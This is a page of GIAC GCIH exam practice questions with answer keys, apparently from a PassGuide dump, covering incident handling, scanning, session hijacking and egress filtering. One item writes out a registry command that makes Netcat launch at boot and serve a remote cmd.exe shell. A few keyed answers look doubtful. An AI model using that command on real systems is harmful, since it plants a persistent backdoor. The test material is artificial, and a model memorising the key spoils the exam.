GIAC Certified Incident Handler v7.1 (GCIH)

Page:    1 / 22   
Total 328 questions

Adam works as a Security administrator for Umbrella Inc. He runs the following traceroute and notices that hops 19 and 20 both show the same IP address.
1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms 2 ip68-98-176-
1.nv.nv.cox.net
(68.98.176.1) 12.169 ms 14.958 ms 13.416 ms 3 ip68-98-176-1.nv.nv.cox.net
(68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv. cox.net (68.100.0.1) 16.743 ms 16.207 ms
4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms 5
68.1.1.4
(68.1.1.4) 12.439 ms 220.166 ms 204.170 ms
6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms 7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms "PassGuide" - 8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms 9 so-
7-0-0.gar1. NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms 10 so-
4-0-0.edge1.NewYork1.Level3.
net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms 11 uunet-level3- oc48.NewYork1.Level3.net
(209.244.160.12) 21.411 ms 19.133 ms 18.830 ms 12 0.so-6-0-0.XL1.NYC4.ALTER.NET
(152.63.21.78)
21.203 ms 22.670 ms 20.111 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153)
30.929 ms 24.858 ms
23.108 ms 14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms
33.910 ms 15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms
49.466 ms 16 0.so-3-0-0.XR1.MIA4.ALTER.
NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms 17 117.ATM6-
0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms 18
PassGuidegw1. customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms 19 www.PassGuide.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms 20 www.PassGuide.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms
Which of the following is the most like cause of this issue?

  • A. An application firewall
  • B. Intrusion Detection System
  • C. Network Intrusion system
  • D. A stateful inspection firewall


Answer : D

Which of the following is a reason to implement security logging on a DNS server?

  • A. For preventing malware attacks on a DNS server
  • B. For measuring a DNS server's performance
  • C. For monitoring unauthorized zone transfer
  • D. For recording the number of queries resolved


Answer : C

Which of the following tools can be used to perform brute force attack on a remote database?
Each correct answer represents a complete solution. Choose all that apply.

  • A. SQLBF
  • B. SQLDict
  • C. FindSA
  • D. nmap


Answer : A,B,C

You work as a Network Administrator for Net Perfect Inc. The company has a Windows- based network. The company wants to fix potential vulnerabilities existing on the tested systems. You use Nessus as a vulnerability scanning program to fix the vulnerabilities.
Which of the following vulnerabilities can be fixed using Nessus?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Misconfiguration (e.g. open mail relay, missing patches, etc.)
  • B. Vulnerabilities that allow a remote cracker to control sensitive data on a system
  • C. Vulnerabilities that allow a remote cracker to access sensitive data on a system
  • D. Vulnerabilities that help in Code injection attacks


Answer : A,B,C

Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Use of a long random number or string as the session key reduces session hijacking.
  • B. It is used to slow the working of victim's network resources.
  • C. TCP session hijacking is when a hacker takes over a TCP session between two machines.
  • D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.


Answer : A,C,D

Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?

  • A. Whishker
  • B. Nessus
  • C. SARA
  • D. Nmap


Answer : B

Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services.
Which of the following are the techniques used for network mapping by large organizations?
Each correct answer represents a complete solution. Choose three.

  • A. Packet crafting
  • B. Route analytics
  • C. SNMP-based approaches
  • D. Active Probing


Answer : B,C,D

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

  • A. Block all outgoing traffic on port 21
  • B. Block all outgoing traffic on port 53
  • C. Block ICMP type 13 messages
  • D. Block ICMP type 3 messages


Answer : C

You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

  • A. Manual penetration testing
  • B. Code review
  • C. Automated penetration testing
  • D. Vulnerability scanning


Answer : D

An attacker sends a large number of packets to a target computer that causes denial of service.
Which of the following type of attacks is this?

  • A. Spoofing
  • B. Snooping
  • C. Phishing
  • D. Flooding


Answer : D

Which of the following methods can be used to detect session hijacking attack?

  • A. nmap
  • B. Brutus
  • C. ntop
  • D. sniffer


Answer : D

Which of the following functions can you use to mitigate a command injection attack?
Each correct answer represents a part of the solution. Choose all that apply.

  • A. escapeshellarg()
  • B. escapeshellcmd()
  • C. htmlentities()
  • D. strip_tags()


Answer : A,B

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ
/d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want to set the Netcat to execute command any time.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.


Answer : B,C,D

Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise?

  • A. Preparation phase
  • B. Eradication phase
  • C. Identification phase
  • D. Recovery phase
  • E. Containment phase


Answer : A

Fill in the blank with the appropriate term.
_______is the practice of monitoring and potentially restricting the flow of information outbound from one network to another



Answer : Egress filtering

Page:    1 / 22   
Total 328 questions